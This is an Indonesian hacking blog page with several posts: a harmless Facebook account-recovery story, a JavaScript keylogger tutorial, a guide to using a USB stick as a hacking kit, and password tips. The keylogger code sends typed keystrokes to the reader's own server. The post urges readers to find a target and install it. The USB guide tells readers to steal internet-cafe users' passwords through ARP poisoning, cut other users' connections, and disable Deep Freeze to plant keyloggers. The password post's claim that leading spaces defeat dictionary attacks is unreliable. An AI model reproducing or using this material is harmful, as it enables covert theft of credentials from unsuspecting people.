Diberdayakan oleh Blogger.
RSS

Senin, 03 Januari 2011

Mengembalikan Account Facebook Yang Dibobol

Account facebook dibobol? Nggak kebayang gimana rasanya. Sebel, sedih, marah dll campur aduk di dalam kepala. Apalagi kalo info dan wtw(wall to wall) dibalas oleh orang jail dengan kata-kata yang nggak enak dilihat. Terus kemudian kita jadi Tanya kesana kemari hanya untuk mencari orang yang bisa mengembalikan facebook kita atau sekedar tau cara dan mau berbagi kepada kita.

Oke, langsung saja sebelum itu dalam artikel ini ada beberapa persyaratan yang perlu diperhatikan yaitu account e-mail Anda tidak dibobol. Walaupun e-mail login facebook Anda sudah diganti oleh orang jail dan e-mail login Anda tersebut dihapus oleh orang jail tersebut, Anda tetap bisa mengembalikan account facebook Anda yang telah dibobol.


Pertama-tama ada skenario berikut ini.


Ardi Nursyasmu (nama disamarkan untuk kepentingan privasi :P) merupakan seorang yang sukses dan memiliki masa depan cerah karena baru saja diterima bekerja di Microsoft Corp. Dia juga terkenal pandai karena dia sekolah di Sussex, kemudian melanjutkan ke Harvard University untuk kuliah dan lulus dengan predikat cumlaude. Untuk membanggakan hasil kerja keras dan keberuntungannya, dia membuat sebuah account facebook dengan e-mail korbanmalpraktek@yahoo.com. Dan setelah berkutat di depan computer selama 2 jam, akhirnya terbentuklah profil seperti dibawah ini(maaf, Ardi Nursyamsu belum bisa mengupload foto :P).





Karena belum pernah tau tentang strong password, dia menggunakan tanggal lahirnya sebagai password dengan pikiran bahwa tidak aka nada yang peduli dengan ulang tahunya(kasiahan amat si Ardi).


rdiearth yang mengaku sebagai hacker elite(padahal newbie aja belum :P), dengan teknik yang sok rumit mencoba mendapatkan username dan password Ardi dan akhirnya berhasil. Kemudian dia login sebagai Ardi Nursyamsu.





Dasar rdiearth orangnya iseng, dia mengubah-ubah informasi di tab info Ardi sehingga jadi seperti ini.





Untuk keamanan, agar facebook yang dia bobol tidak di bobol oleh orang iseng lainnya, maka rdiearth merubah settingan username dan password Ardi dan beginilah tampilannya.





Akhirnya setelah puas, rdiearth logout dari account Ardi untuk kemudian login ke facebooknya sendiri (Saya rasa ini tidak perlu dibahas).
Ardi yang penasaran sudah berapa friend request yang diterimanya, mencoba login ke facbooknya. Namun sayang dia gagal :0.





Ardi merasa sebal. Dia mencoba berulang kali login ke accountnya tapi selalu gagal. Akhirnya dia mendapat pesan dari langit. “Hai Ardi, cobalah buka e-mail accountmu.” Ardi sempat bingung, namun akhirnya dia membuka e-mailnya. Wah, ada notification dari facebook kalau ada seseorang yang merubah username di passwordnya. Lalu dia mengeklik link untuk membatalkan perubahan tersebut.





Kemudian, muncul halaman dari facebook dibawah ini.


Ardi meng-klik tobol “Konfirmasi Permintaan” dan mengikuti instruksi selanjutnya.





Akhirnya facebook Ardi berhasil dikembalikan dan ketika rdiearth ingin melihat facebook jarahannya keesokan harinya, dia merasa gondok karena ternyata Ardi lebih pintar darinya(atau mungkin lebih beruntung :P).





Pada dasarnya cara tersebut secara implisit sudah disediakan oleh facebook, hanya saja mungkin banyak orang belum mengetahuinya(semoga Saya salah ).


Akhir kalimat, semoga artikel ini bermanfaat dan seperti biasa Saya sangat mengharapkan kritik dan saran Anda agar tulisan-tulisan Saya ini akan lebih berkembang kedepannya.

java script key logger

Wahahahahaha.... Saya tau Kalian pasti kangen banget neh sama Saya . Pada kesempatan kali ini Saya akan sedikit membahas tentang Javascript Keylogger. Wow... Apalagi tuh, mungkin Google bisa menjawab pertanyaan Kalian .

Oke tanpa banyak basa basi langsung aja yah...


Pertama bukalah notepad kesayangan kalian atau yang lainnya kayak Wordpad, Notepad ++... Pokoknya terserah dah...

Kemudian paste kode berikut:

[+]------------------------------------------------------------------


var key = '';

var space = ' '
function start()
{
var xmlhttp;
if (window.XMLHttpRequest)
{
// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else if (window.ActiveXObject)
{
// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
alert("Browser Kamu Tidak Support XMLHTTP!");
}
xmlhttp.open("POST","http://websitekamu/buka.php",true);
xmlhttp.send(null);
}
function ajaxFunction()
{
var xmlhttp;
if (window.XMLHttpRequest)
{
// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else if (window.ActiveXObject)
{
// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
alert("Your browser does not support XMLHTTP!");
}
xmlhttp.open("POST","http://websitekamu/salin.php?d="+key,true);
xmlhttp.send(null);
}
document.write('');

[+]------------------------------------------------------------------


Lalu simpan dengan nama keylog.js... Inget Bro, ekstensinya JS. Dan satu lagi jangan lupa, "websitekamu" diganti dengan

URL kamu sendiri...
Buat lagi buka.php dan salin.php di notepad dengan script sebagai berikut

buka.php


[+]------------------------------------------------------------------


$data = $_GET['d'];

$fp = fopen('hasil.txt', 'a');
fwrite($fp, $data);
fclose($fp);
?>

[+]------------------------------------------------------------------


salin.php


[+]------------------------------------------------------------------


$data = $_GET['d'];

$fp = fopen('hasil.txt', 'a');
fwrite($fp, $data);
fclose($fp);
?>

[+]------------------------------------------------------------------


Maka sekarang kalian mempunyai tiga file yaitu keylog.js, buka.php, salin.php...

Nah karena saya mencoba di localhost maka saya akan mencoba membuat script HTML sederhana
yang akan digunakan sebagai website saya sendiri.

[+]------------------------------------------------------------------





Jasakom Community Ketik Apa Aja Yang Kamu Suka





[+]------------------------------------------------------------------


Dan simpan dengan nama jasakom.html

Nah apabila kalian ingin menaruhnya di website kalian maka kalian cukup menambahkan

[+]------------------------------------------------------------------




[+]------------------------------------------------------------------


Dah ngerti? Sekarang letakkan keempat file tersebut jasakom.html, keylog.js, buka.php dan mulai.php

di dalam direktori yang sama. Nah kalo saya di direktori C:wampwwwwebsitesaya
karena saya menggunakan WAMP server
Nah maka dari itu saya akan mengganti URL yang ada di keylog.js menjadi

[+]------------------------------------------------------------------


http://localhost/websitesaya


[+]------------------------------------------------------------------


Praktek


Maka ketika kalian membuka Browser kalian dan mengarahkan ke http://localhost/websitesaya/jasakom.html

Nah disini kalian bisa ketik apa aja




Saya akan ketik "Makasih Banyak Dah Membuang Waktu Kalian Yang Berharga Untuk Melihat
Artikel Ini"

Maka kalian akan melihat munculnya hasil.txt yang berisi kata2 tersebut

Oke sampai disini dulu yah, mungkin artikel ini kurang berguna tapi yah... Hanya itu
yang bisa Saya berikan...
Sekarang yang perlu kalian lakukan adalah cari target dan pasang keylog tersebut
Emang gak sebanding dengan r57, C99, C100, dkk tapi jika dikembangkan pasti sama
asiknya kok...

* Contact

cruz3n@jasakom.org
cruzenaldo@gmail.com

* Blog Jelek Dan Sederhana

http://cruzenaldo.blogspot.com

* Thanks

~ JESUS CHRIST, My EVERYTHING... Without YOU im NOTHING
~ Bokap dan Keluarga dirumah
~ t3hmadhatt3r@gmail.com (Makasih buat penjelasannya )
~ All Jasakomers yang telah membuat hidup saya masih penuh warna... ;p
~ Master2 Yang suka nongkrong di FORUM, mana Bro artikel Lo ditunggu disini
~ Witha Rasmana a.k.a Chrn0 (I Love You...)
~ Dan untuk Kalian yang dah baca artikel sederhana ini
~ Jasakom Not Dead

Selasa, 28 Desember 2010

Flashdisk, senjata mungil para Hacker

Postingan yang saya buat kali ini membahas tentang penggunaan flashdisk sebagai senjata/media hacking dan pemanfaatannya sebagai security tools. Mungkin anda bisa dengan mudah membaca hal-hal yang berkaitan dengan artikel ini pada media cetak tapi pada media cetak biasanya pembahasannya hanya bersifat serba-serbi saja dan singkat,sangat jarang ditemukan pembahasan yang mengarah pada dunia bawah tanah, dunia kita, dunia para pemikir diluar batas!!!

Flashdisk yang kita kenal adalah sebuah perangkat portable yang sering digunakan sebagai media penyimpanan data, baik data pekerjaan kantor, kampus atau data-data penting lainnya.karena konsep dasar diciptakannya flashdisk adalah sebagai media penyimpanan data yang bersifat portabel dan gampang dibawa kemana-mana, banyak pemilik flashdisk yang menganggap flashdisk hanya berguna sesuai dengan konsep dasar penciptaannya. padahal dengan sedikit kreativitas anda dapat menjadikan flashdisk anda sebagai sebuah media pembantu dalam proses pembelajaran dan tindakan hacking maupun penerapan security/keamanan anda saat beraktivitas pada komputer yang anda gunakan.

Sebagai langkah awal sebelum masuk pada pembahasan yang lebih jauh,saya akan memaparkan apa yang saya lakukan pada flashdisk yang saya gunakan. flashdisk saya disini hanyalah sebagai pembanding karena tentunya anda memiliki ide yang lain yang ingin anda terapkan. pada flashdisk saya telah terinstall 2(dua) aplikasi portable yaitu PORTABLEAPPS buatan PortableApps.com dan LIBERKEY dari LiberKey.com. kedua aplikasi tadi kemudian saya bagi penggunaannya sesuai dengan kebutuhan. Penggunaannya akan saya paparkan lebih terperinci seperti di bawah ini :

PORTABELAPPS
Anda sudah pasti pernah bekerja pada computer anda melalui windows explorer dikarenakan pada modus ini anda leluasa dalam mengatur direktori maupun berpindah direktori secara lebih efisien karena windows explorer menampilkan directory melalui folder tree. Nah, portableapps memiliki fungsi yang hampir sama dengan windows explorer dan sangat mirip dengan my document pada system operasi windows. Anda bahkan mempunyai menu start tersendiri untuk mengakses flasdisk anda dan menjalankan program yang digunakan layaknya menu start pada windows. Dengan kemampuan seperti ini, maka anda dapat mengatur file-file yang ada pada flashdisk anda dengan rapi karena telah tersedia secara default beberapa direktori seperti Documents, music, video, picture, explorer ( layaknya windows explorer ) bahkan tersedia directori untuk backup, menu option, help dan fungsi search. Beberapa software disertakan secara default antara lain:

1. Browser Mozilla firefox portable mode
2. Mozilla thunderbirth
3. CCleaner ( penghapus jejak dan file sampah atau temporary file )
4. Clamwin portable ( anti virus )
5. keePass portable
6. open office
7. beberapa aplikasi multimedia,dsb.

Berdasarkan karakteristiknya, portableapps sebaiknya digunakan sebagai tools manajemen flashdisk anda serta editor untuk file tuga-tugas anda.

LIBERKEY

Inti dari tutorial ini berada pada aplikasi Liberkey. Saya katakan demikian karena jika di ibaratkan sebuah sebuah live disk untuk para hacker ataupun administrator jaringan seperti auditor, whax, slackware atau backtrack ( backtrack 2+ jasakom) maka liberkey bias dikatakan sebuah system operasi yang berjalan melalui media flashdisk ( dapat pula dianggap sebagai system operasi virtual walaupun sebenarnya hanyalah kumpulan software portable). Secara default liberkey menyertakan beberapa aplikasi yang bias digunakan untuk aktivitas hacking disamping aplikasi standar yang lain.beberapa tools yang bias di gunakan untuk hacking maupun security defence antara lain adalah sebagai berikut:

1. recuva, aplikasi pembalik data yg telah terhapus.
2. Search my files, bias anda gunakan untuk mencari file-file yang terinfeksi firus maupun file-file utama sebuah virus, atau file-file rahasia pada sebuah computer.
3. Picpick, aplikasi screen capture (penangkap gambar)
4. Firefox portable, browser aman di karenakan anda terhindar dari aplikasi jahat pada kebanyakan browser warnet.
5. Runscanner, anti virus sekaligus anti spyware
6. Truecrypt, pengenkripsi disk drive
7. HashMyFile, software pengukur nilai hash
8. UltraShredder, menghapus file secara aman agar tidak bias dikembalikan secara utuh
9. NetWorks, aplikasi analisa data pada koneksi internet
10. PE network configurator, aplikasi untuk konfigurasi jaringan
11. Yale, pengukur bandwith network adapter
12. Team Viewer, aplikasi remote desktop
13. Softperfect Network Scanner, aplikasi scanner jaringan
14. Unlocker, tools penghapus file atau folder yang tidak bias dihapus secara normal.

Liberkey masih mempunyai banyak tools yang tidak penulis paparkan diatas di karenakan jumlahnya cukup banyak untuk di jelaskan, selain akan membuat tutorial ini menjadi tidak efisien dan terlihat seperti menyuapi anda sehingga lebih baik untuk menyerahkan masalah ini pada kreativitas anda masing-masing.ok

Selain tools portable diatas, tentunya ada kekurangan yang mungkin anda rasakan dikarenakan adanya tools favorit anda yang tidak disertakan. Untuk itu anda juga dapat mengisi flashdisk anda dengan software lain seperti Cain able, netcut, angry ip-scanner, super scan, notepad++,anti deepfreezedll.

PENERAPAN
Pada bagian penerapan ini, kita akan membuat sebuah scenario. Kita mengandaikan misalanya anda masuk pada sebuah warnet yang menerapkan retriksi yang ketat. Menu RUN di copot, Commandprompt di babat, bahkan notepad pun di comot. Tentunya anda akan merasa kenyamanan anda terusik akibat retriksi tersebut (masalah klasik, keamanan berbanding terbalik dengan kenyamanan), sehingga anda tidak dapat melakukan aktivitas hacking yang sudah anda pelajari di rumah. Jangan khawatir justru hal seperti ini patut anda jadikan motivasi dan tantangan ( hacking tanpa tantangan/masalah = BASI )dan jangan lupa bahwa anda telah membawa senjata mungil anda( flashdisk ).

Beberapa hal kecil yang bisa anda lakukan misalnya, jika anda ingin menggunakan command prompt yang diretriksi, anda bisa membuatnya dengan teks editor notepad. Buka notepad kemudian ketikkan “command.com” tanpa tanda petik dan save dengan ekstensi “.bat” pada desktop anda, selamat anda bias menggunakan command prompt. Notepad di retriksi? Jangan khawatir, ingat selalulah membawa file notepad kosong pada flashdisk anda atau anda bias mendownload sebuah file yang belum memiliki software default sebagai pembukanya. Gunakan open with notepad dan hapus halaman notepad tersebut lalu ketikkan code untuk membuat commandprompt. Selamat anda berhasil.

Jaringan terasa lambat dikarenakan bandwith yang terbagi pada semua computer di jaringan? Gunakan NETCUT yang telah anda bawa pada senjata mungil anda. Jalankan netcut dan cut koneksi computer lain dijaringan.selamat bandwith anda bertambah

Ingin mencuri password administrator atau FB pengguna warnet? Jalankan CAIN ABEL pada modus ARP poisoning dan silahkan menunggu korban anda.
Ingin memasang keylogger atau sejenisnya, jalankan anti deepfreeze. Selamat keylogger anda telah berjalan tanpa harus memusingkan deepfreeze yang telah anda lumpuhkan

Anda masih bias melakukan banyak hal lainnya sesuai kebutuhan anda. Sampai saat ini anda mungkin telah mendapat gambaran bagaimana memanage flashdisk anda menjadi sebuah senjata saat anda berada di dalam sebuah jaringan. Maaf jika tutorial ini masih jauh dari sempurna dan memiliki banyak kekurangan dikarenakan penulis masih bertaraf newbie, hanya motivasi untuk belajarlah yang membuat penulis memberanikan diri untuk tampil kehadapan teman-teman yang hebat di komunitas tercinta ini.

Senin, 27 Desember 2010

Strong Password Yang Mudah Diingat

Password merupakan suatu 'kunci' untuk dapat mengakses account yang Anda miliki. Baik berupa account sederhana seperti account jejaring sosial, maupun account yang sangat penting seperti Internet Banking, PayPal atau WebHosting yang anda miliki pasti membutuhkan password untuk masuk.

Nah masalahnya, penggunaan password saat ini masih memiliki kelemahan yang belum terpecahkan juga dalam masalah tingkat keamanannya. Banyak orang-orang yang accountnya telah dibobol yang memiliki masalah sama yaitu weak password(password lemah).

Kemudian para pakar komputer merekomendasikan aturan strong password berupa:

  1. Karakter harus lebih dari 6
  2. Merupakan kombinasi dari alphanumeric(a..z, 0..9) dan karakter khusus(!@#$%^&*..dst)
  3. idak boleh menggunakan kata yang terdapat dalam kamus atau istilah komputer seperti (academy, admin, daemon, dll...)
Pada akhirnya, para pakar memberikan saran agar menggunakan password seperti @hm@dfu4d!, th3n3tte!2, b@tm4nb3g1n$, dll untuk keamanan account anda.

Sebentar, apakah password-password diatas mudah diingat?
Hmm, saya pun kesulitan mengingatnya. melakukan Reset Password untuk setiap kali login bukan solusi keamanan yang baik bukan?

Nah saya menemukan suatu trik (saat melihat lihat dictionary yang digunakan untuk attack password) dimana dictionary attack tidak bisa bekerja pada kata yang terdapat spasi diawal kata tersebut seperti " admin", " root", " allicia", dst...

Oke langsung saja, gimana sih cara membuat strong password yang mudah diingat?
(karakter spasi " " akan digambarkan dengan underscore "_")
  1. Kita bisa menambahkan spasi di awal kata/frase yang kita gunakan sebagai password(semakin banyak makin bagus).
    contoh: "_____united"(5 spasi), "___harrypotter"(3 spasi), "______jehovah"(6 spasi), dsb.
  2. Kita juga bisa menambahkan spasi antar huruf sehingga bisa memperpanjang kata menjadi 2 kali lipat.
    (saya telah mencoba di wordpress.com dan password yang saya gunakan dikenalis sebagai strong password)
    contoh:"_r_i_n_a_l_d_i", "_k_a_m_b_i_n_g", "_y_o_l_a_n_d_a", dsb.
  3. Selain itu, bisa juga ditambahkan karakter khusus pada password anda seperti karakter (+, -, =, dsb)
    contoh:Anda bisa membuat tanggal lahir anda (misal 17 Juni 1993) menjadi password seperti ini "1+7+0+6+1+9+9+3"
Selain beberapa contoh tadi, Anda juga bisa mengembangkan password-password lain yang tentunya sesuai dengan pembahasan kita, Password Yang Strong dan Mudah Diingat.

Sampai jumpa di Artikel berikutnya. (Kritik dan Saran sangat diharapkan)

arti seni hacking..,

aku...
YA! aku adalah aku...
diriku bukan dia bukan dirimu...

hakcing itu bagiku kebutuhan, akan bermanfaat di masa depan...